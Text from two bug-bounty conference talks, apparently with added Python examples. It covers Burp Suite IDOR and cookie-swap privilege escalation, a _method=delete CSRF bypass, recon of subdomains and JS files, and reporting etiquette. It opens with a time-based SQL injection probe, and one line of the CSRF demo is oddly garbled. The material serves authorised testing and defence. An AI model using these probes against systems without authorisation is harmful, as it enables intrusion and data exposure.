id=1/sleep(10)
Hacking with BurpSuite
● IDOR(s) are always easy, playing with the id parameters. Manipulate the create requests.
● id=1 > id=2 > Easy Money
Easy Privilege Escalation with Repeater
● Have 2 different user accounts, one low privileged user and the other one with some level of permissions.
● Catch the request in BURPSUITE, throw it into a "Repeater tab", replace the cookies of the high level privileged user with the low level privileged user's, see if it's a success!
Hacking with BurpSuite
JS for the WIN
Feeding these into tools: https://github.com/GerbenJavado/LinkFinder
python linkfinder.py -i /Desktop/z.burp -b -o cli
Shooting in Dark? Understand the application flow to find more bugs
You're doing it wrong -
● If you haven't spent a good amount of time studying the target.
● If you haven't understood the privileges and functionalities of a user.
● If you haven't checked their available docs, nor gathered all the information about the target.
What happens next if you haven't done your homework?
Researchers have a tendency to jump on the target application and start attacking it. What happens then?
YOU END UP GETTING DUPES
If you've invested a good amount of time on a target, you will:
● Get a better understanding of how the target app works.
● Know what parameters are usually being used by the target app.
● Understand the functionalities & privileges of the users in the target app.
● Be able to identify what parameters to use when you discover tons of endpoints in JS files.
Found an internal endpoint in JS and immediately knew what parameters to use based on my past research
Read the Docs = Get a BUG?
Few Nice Reads:
● Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters - https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
● Discovering hidden endpoints using LinkFinder - https://gerbenjavado.com/discovering-hidden-content-using-linkfinder/
● Getting started in Bug Bounty - https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a
Better Bug Bounty Report
better bug reports -> better relationship -> better bounties
Sharing from other side of the fence
What you shouldn't do?
● Follow up after 5 mins of report submission
● Bounty Plz!
● Contacting someone from Security Team on Twitter asking for an update.
The Wrong Way, How not to submit a report?
The Right Way -
● Introduction
● Details
● Steps to reproduce (POC)
● Impact
Before reporting, always think from the organization's point of view and think from the other side -
Understand the company's nature of business
Seeing an image of other users on a company like Zomato? Seriously, are you kidding me? That's not sensitive at all - Closing it as N/A
VS
Viewing others' uploaded images on an Image Sharing Site
Mantra to build a strong relationship with Security team
● Be Professional with your communication
● While submitting a report, provide a detailed report with clear steps to reproduce
● Don't bug or spam them, prepare a schedule for follow ups
● Don't do this - send a LinkedIn invite, or DM on Twitter asking for an update
Keeping up with new trends
....Staying on top of new hacking trends can help you earn more bounties.
Sir, what should we do to keep up with all the new trends?
#BugBounty #BugBountyTip #TogetherWeHitHarder
Subscribe to topics like Information Security, Bug Bounty, Infosec, etc..
IT'S ALL ABOUT SOURCES
Hacktivity! https://hackerone.com/hacktivity
ZERO DAILY! https://hackerone.com/zerodaily
Profit!! Time to earn bounties...
LIVE BURP SUITE SESSION
#bugbountytip
Waybackurls
Scrape URLs using - https://github.com/tomnomnom/waybackurls/
root@pt:~/tools/recon/waybackurl$ cat domains.txt | waybackurls > urls
root@pt:~/tools/recon/waybackurl$ cat urls | grep ".js"
#bugbountytip
Bringing a few more #tips:
● Search for developers, QA on Stackoverflow
● Always run wfuzz / dirsearch on all subdomain(s) found to discover more content, more bounties?
● Earlier this year, I got a bounty for redacted.corp.com/documentation and found an excel spreadsheet of the database, eehhh, easy money 😳
● Can't CSRF a delete method? A few frameworks / API(s) allow "faking" methods via additional parameters, ex:
  ○ Adding a parameter such as: method=delete | _method=delete -> the API will parse it as a Delete request.
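An added example, not from the workshop, of the method-override behaviour the last tip describes, in a minimal constructed request handler: the vulnerable version only applies its CSRF check to literal DELETE requests, so a cross-site POST carrying _method=delete reaches the delete branch unchecked; the hardened version resolves the override first and requires the token for every state-changing verb. Handler, session and form values are all constructed.

```python
import hmac
import secrets
from urllib.parse import parse_qs

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
OVERRIDE_FIELDS = ("_method", "method")   # the parameter names the tip mentions


def effective_method(method, form):
    """Framework-style override: a POST may ask to be treated as another verb via a form field."""
    if method == "POST":
        for field in OVERRIDE_FIELDS:
            if field in form:
                return form[field][0].upper()
    return method


def token_ok(form, session):
    """Constant-time comparison of the submitted CSRF token against the session's."""
    token = form.get("csrf_token", [None])[0]
    return token is not None and hmac.compare_digest(token, session["csrf_token"])


def delete_vulnerable(method, form, session):
    """CSRF check keyed on the transport verb. A real DELETE is protected, but the override
    is resolved only afterwards, so POST + _method=delete is never checked."""
    if method == "DELETE" and not token_ok(form, session):
        return 403
    if effective_method(method, form) == "DELETE":
        return 204          # resource deleted
    return 405


def delete_hardened(method, form, session):
    """Resolve the override first, then require the token for every non-safe effective verb
    (which also covers plain POST, the verb a cross-site form can always send)."""
    verb = effective_method(method, form)
    if verb not in SAFE_METHODS and not token_ok(form, session):
        return 403
    return 204 if verb == "DELETE" else 405


def new_session():
    return {"csrf_token": secrets.token_hex(16)}


def demo():
    """Status codes for a token-less cross-site POST and for a legitimate same-site request."""
    session = new_session()
    forged = par<br>se_qs("_method=delete") if False else parse_qs("_method=delete")
    legit = parse_qs("_method=delete&csrf_token=" + session["csrf_token"])
    return {
        "vulnerable/forged": delete_vulnerable("POST", forged, session),
        "hardened/forged": delete_hardened("POST", forged, session),
        "hardened/legit": delete_hardened("POST", legit, session),
    }


if __name__ == "__main__":
    print(demo())
```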
#bugbountytip
Sir, please one more! Okay, take this ezzy money!
● Always check whether Strict Transport Security is enforced. Many times, hxxp://redacted.com is not redirected to https, and many companies are interested to hear about "Weak Login function over HTTP".
Recap | Let's Roll It Back
● Dive deep into the target using Passive techniques:
  ○ Virustotal
  ○ crt.sh
  ○ censys.io
  ○ https://transparencyreport.google.com/https/certificates?hl=en
  ○ https://developers.facebook.com/tools/ct
  ○ CSP Headers
  ○ Don't forget the third party services, those are so helpful and always help you to learn more about the target
● Shodan.io and fofa.so will give you a lot of juicy stuff.
● Always give a shot at Mobile Apps - use apkscan.nviso.be | virustotal ...
● Submit better reports, think from the other side about the impact before submitting.
● Keeping up with what's happening around will help you earn more bounties.
Thank You
Prateek Tiwari
prateek0490@gmail.com
@prateek_0490
linkedin.com/in/prateek-tiwari-867b905a/
facebook.com/prateek0490

Journey to the top on
The untold tales of struggle and pain
CHCON 2017
29/11/17
About Me
o Ahmad Ashraff @yappare
o Origin: Malaysia
o Education: Bachelor of Chemical Engineering
o Experience: +7 years in ITSec industry
o Current: Security Consultant at Aura Information Security
o Hobbies: Backpacking, Watching Animes
About the Presentation
o What is bug bounty program
o Why I started bug hunting
o Problems and troubles – How I encountered them
o Tips and Tricks
o Hope people stop asking me "How many bugs did you find last weekend?"
What is bug bounty program?
A reward offered to a person who identifies an error or vulnerability in a computer program or system.
https://en.oxforddictionaries.com/definition/bug_bounty
How companies manage bug bounty programs
Own programs:
• Own platform
• Mature in process
• Great pool of budgets
• Expert security engineers
Self-manage via 3rd party platform:
• Standard set by own orgs
• Manage by own team
• Risk/Reward decided by themselves
• Miscommunication can happen
Managed by 3rd platform:
• Platform's analyst act as a middle person
• Most of orgs follow the standard provided
• Platform analysts have knowledge
Why I Started Bug Bounty?
Car/Transport, Kids, Event, Married, Study Loan, House, Gadgets, Travelling, Hobbies, Parents
$%#^#& that might happen
~$850 paid per month
3rd August 2012
4 months later
1 XSS – Found in less than a day = $500
Monthly paid = ~$850
1 XSS in Paypal > Half of monthly paid
Study Loans, Personal Loans, Cars, Credit Cards
It is not just about money
• More knowledge/sharing from other experts
• New techniques
• Better profile
• I'm still at a beginner level
Hi folks, meet...
(Bugcrowd leaderboard, https://bugcrowd.com/leaderboard, with notes on the names:)
• Joined Tesla's security team
• Joined Bugcrowd Technical Operation
• Head of Trust and Security at Bugcrowd
• Doing windows server configuration review.
• 2015. 1st place. Looks good
• Early 2016. Still hold the title.
• Oct 2016. Started to be a busy guy. Lost from the radar.
• A wizard
• Normal human being
• Talented full-time bughunter from UK
• Anonymous
• Attack-dev
Public VS Private Programs in Bugcrowd
Public:
• Can participate once registered
• Kudos/Rewards
• Tested multiple times
• Orgs ready to go to public
• Web, mobile, hardware, API, IOT
Private:
• Two types, ongoing & flex (on-demand)
• Kudos/Rewards
• Web, mobile, hardware, API, IOT
• Tested few times or fresh
• Orgs want to be tested by trusted users
Problems..
Equipment and Tools
• Tough competition. Experts everywhere
• Fast and Furious. Really fast. Need to avoid duplicate submission
5 MINUTES
30 MINUTES
55 MINUTES
Most programs start at UTC time zone
At work. Doing host review / Fuzzing / Recon
Me in NZST.
Able to optimize my free times and use ~ 10 hours per week
There is no magic, they are just the forgotten basics
Tips 1 – Focus on less participants
Mobile Applications
• Windows < iOS < Android
• Cert Pinning
Iot/Device
• Specific device need to be purchased
• Need knowledge, tools
• Preparing is a mess
Scripts/Binary
• Dev knowledge, binary exploitation
• Fuzzing technique
Wide targets - Reverse recon automated+manual
Old or No Reward programs
Complex setup - AWS account, premium, developer, OS dependent
Reverse recon
IF the provided in scope is/are production sites
• Check on their dev/staging/qa environment
• Check on their Github
• Check on their old sites through wayback archive
(Good in discovery of path/modules/features)
IF the provided in scope is/are staging/testing/dev/qa sites
• Check on their production environment
• Check on their old sites of the production through wayback archive
• Check on their support/issues website
Can do this back to back
Wide targets: *.blabla.com, All BlaBla's public websites
Automated:
- Google/Bing/Yahoo
- Subdomain scanner
- Wayback archive
- CMS scanner
- Known vulnerabilities
Manually:
- Github
- Support
Repeat on other subdomains, countries
Profit - Submit - Save all the writeups
AQUATONE
https://github.com/michenriksen/aquatone
aquatone-discover (discovery) - sources: Threat Crowd, HackerTarget, Certificate Search (crt.sh), Google Transparency Report, Censys, Shodan, DNSDB, Riddler, VirusTotal, PassiveTotal, Dictionary, Netcraft
aquatone-takeover - Find misconfigured DNS setup
aquatone-scan (scanning) - Port scan on common web server ports
aquatone-gather (gathering) - Access the discovered web ports and provide headers information plus screenshot
Tips 2 – Risk Matrix Used
P1 – 40 points + $1500
P2 – 20 points + $900
P3 – 10 points + $300
P4 – 10 points + $100
P5 – 0 points + $0
Bugcrowd's VRT is a resource outlining Bugcrowd's baseline priority rating, including certain edge cases, for vulnerabilities that we often see.
Cool bugs / Not so-cool bugs
Still a P3 risk. Still received the same points
Still received the points and rewards
Tips 3 – Do Not Stop at One Attack
http://www.brokensites.com/admin/login.php?redirect_url=/dashboard
Attacks tried on the same parameter: Open Redirect? Lack of bruteforce protection? XSS? Cleartext? Default/Weak Creds? SSRF? RCE?
Ratings on the slide: P4 = 5 + $100 (two findings), P3 = 10 + $300 (three findings), P1 = 40 + $1500 (two findings)
Total points: 120
Total rewards: $4100
Same parameter, same program, different time of submission, different attacks, 1 dupe, 1 valid.
Tips 4 – Mobile View
Main site:
• Redirected to main page
• Forbidden
• No Access
Mobile hosts to try:
m.website.com
mobile.website.com
touch.website.com
www.website.com/m/
www.website.com/mobile
Mobile version:
• Redirected to mobile page
• New session cookies?
• More features
• More user inputs
• Lack of security checks
Tips 5 – Be Friend with JS Files
Time consuming, but it is worth your effort
• Locate other .js files
• Locate paths/files that are not in crawled results
• Locate admin's features/actions
• Hardcoded credentials
• Backup/Github/Dev sites
• Method of encryption
View source > find .js > analyse
https://bountysite.com/admin/dashboard?redirect=/
Check on login.js: https://bountysite.com/admin/dashboard/js/login.js
Check on another JS: https://bountysite.com/admin/dashboard/photography/loginx
P1 = 40 + $1000
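An added example, not LinkFinder's, JS-Scan's or JSParser's code, of the extraction step that this tip, the "JS for the WIN" slide and the "Find New Endpoints from JS Files" walkthrough earlier on this page all rely on: pull quoted URLs and paths out of a script, resolve them against the page they were served from, and separate further .js files (the "locate other .js files" item) from static assets and candidate endpoints. The JavaScript fragment and every host in it are constructed.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed fragment of a login-page bundle; hosts and paths are made up.
SAMPLE_JS = r'''
var API = "https://api.example-corp.com/v3";
function load(){ $.get(API + "/internal/internal_accounts", cb); }
fetch('/internal/internal_something/accounts?limit=50');
const cfg = {endpoint: "/admin/dashboard/photography/loginx", retries: 3};
img.src = "static/img/logo.png";
var other = "//cdn.example-corp.com/bundle.min.js";
var notapath = "some text here";
'''

# A quoted string that looks like a URL, an absolute path, or a relative path with a directory part.
LINK_RE = re.compile(
    r"""["'`](?P<link>"""
    r"""(?:https?:)?//[^"'`\s]+"""                 # absolute or protocol-relative URL
    r"""|/[A-Za-z0-9_./-]+(?:\?[^"'`\s]*)?"""      # absolute path, optional query string
    r"""|[A-Za-z0-9_-]+(?:/[A-Za-z0-9_.-]+)+"""    # relative path such as static/img/logo.png
    r""")["'`]"""
)
STATIC_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".css", ".woff", ".woff2", ".ico")


def extract_links(js):
    """Unique quoted links in order of first appearance."""
    seen, links = set(), []
    for m in LINK_RE.finditer(js):
        link = m.group("link")
        if link not in seen:
            seen.add(link)
            links.append(link)
    return links


def triage(js, page_url):
    """Resolve each link against the page URL and bucket it: more JS to read, static noise, or an endpoint."""
    buckets = {"js_files": [], "static": [], "endpoints": []}
    for link in extract_links(js):
        absolute = urljoin(page_url, link)          # handles '/path', 'rel/path' and '//host/path'
        path = urlsplit(absolute).path.lower()
        if path.endswith(".js"):
            buckets["js_files"].append(absolute)    # feed these back through extract_links
        elif path.endswith(STATIC_EXT):
            buckets["static"].append(absolute)
        else:
            buckets["endpoints"].append(absolute)   # not in crawled results; review these
    return buckets


if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_JS, "https://www.example-corp.com/login").items():
        print(bucket, items)
```

Comparing the endpoint bucket against what the crawler saw gives the list of routes that need their own authorisation review, which is how a defender should read the same output.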
Tips X – Out of Scope
Some of the programs have a number of out of scope issues that they don't want to see.
I don't participate.
List of tools
• Burp Suite Pro
• Recon tools
  – Aquatone - https://github.com/michenriksen/aquatone
  – Spiderfoot - http://www.spiderfoot.net/
  – Enumall - https://github.com/jhaddix/domain
  – Sublist3r - https://github.com/aboul3la/Sublist3r
• Scanning tools
  – WPScan - https://wpscan.org/
  – Droopescan - https://github.com/droope/droopescan
  – SQLMap - http://sqlmap.org/
  – OXML_XXE - https://github.com/BuffaloWill/oxml_xxe
• JS Parser
  – https://github.com/zseano/JS-Scan
  – https://github.com/nahamsec/JSParser
Thank you to
• Christchurch Conference 2017
• Aura Information Security
• BugCrowd
• Bug hunters all over the world
• BurpSuite Pro